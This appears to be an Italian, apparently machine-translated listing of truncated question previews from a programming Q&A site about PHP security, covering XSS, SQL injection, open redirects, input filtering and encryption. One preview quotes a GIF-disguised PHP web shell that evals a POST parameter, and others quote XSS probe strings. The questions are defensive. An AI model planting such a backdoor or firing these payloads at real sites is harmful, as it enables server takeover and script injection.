Ho creato box di selezione per anni, ma non ho mai saputo che avresti potuto modificarlo con firebug e inviarli con valori non evitati, ovviamente questo non sarebbe successo se il codice fosse protetto.
Ecco un esempio:
<select name="ty...
Stavo aggiornando del codice PHP seguendo il consiglio di non usare più $_GET e $_POST ma invece di passare alle funzioni filter_input() più sicure.
Pensavo che quella funzione mi avrebbe salvato in questo stupido caso:
<?...
La mia applicazione web mi consente di inviare il modulo di login per reindirizzare a una determinata pagina del sito Web dopo aver effettuato l'accesso. Ad esempio, se l'utente passa all'url http://localhost/login.php?returnto=%2FconfirmEmail...
Ho trovato questo file sul mio server, contiene il seguente codice:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
Non c'è altro codice oltre quello sopra. È dannoso?
Recentemente ho acquistato un account da una società di hosting condiviso e avevo bisogno della funzione php system per essere abilitata per uno dei miei progetti.
Così ho creato un ticket e ho chiesto loro di abilitarlo. Questo è quello c...
Sto usando l'edizione della community di Netsparker per controllare la mia app per eventuali buchi di sicurezza generali. Sto ricevendo molte delle seguenti aree di problemi probabili XSS:
my_php_file.php?nsextt=" stYle=x:expre/**/ssion(alert(...
Sto utilizzando le funzioni sodium_crypto_secretbox e sodium_crypto_secretbox_open in PHP (attualmente PHP 5.6, utilizzando paragonie/sodium_compat ).
Se un utente ha testo cifrato, nonce e decrittografato, può determinare la ch...
Ho il codice qui sotto nel mio newsview.php. Voglio sapere perché il codice sottostante vulnerabile a SQL injection. Ho già testato l'iniezione sql nel codice qui sotto.
$id = intval($_REQUEST['id']);
$result = mysql_query("SELECT * FROM news...
Le lingue come Cold Fusion e PHP sono meno sicure perché sono incorporate nell'HTML che viene inviato a un client? Qualcuno mi ha detto che sono meno sicuri perché mancano di astrazione.
CHIARIMENTO: per astrazione penso che il mio amico inte...
Posso impedire l'attacco XSS con la funzione MySQL REPLACE? È questo metodo sicuro e accettabile?
Esempio di seguito:
INSERT INTO persons(Name, Surname)
VALUES(REPLACE('<script>alert("Test")</script>', '<script>', ''), 'S...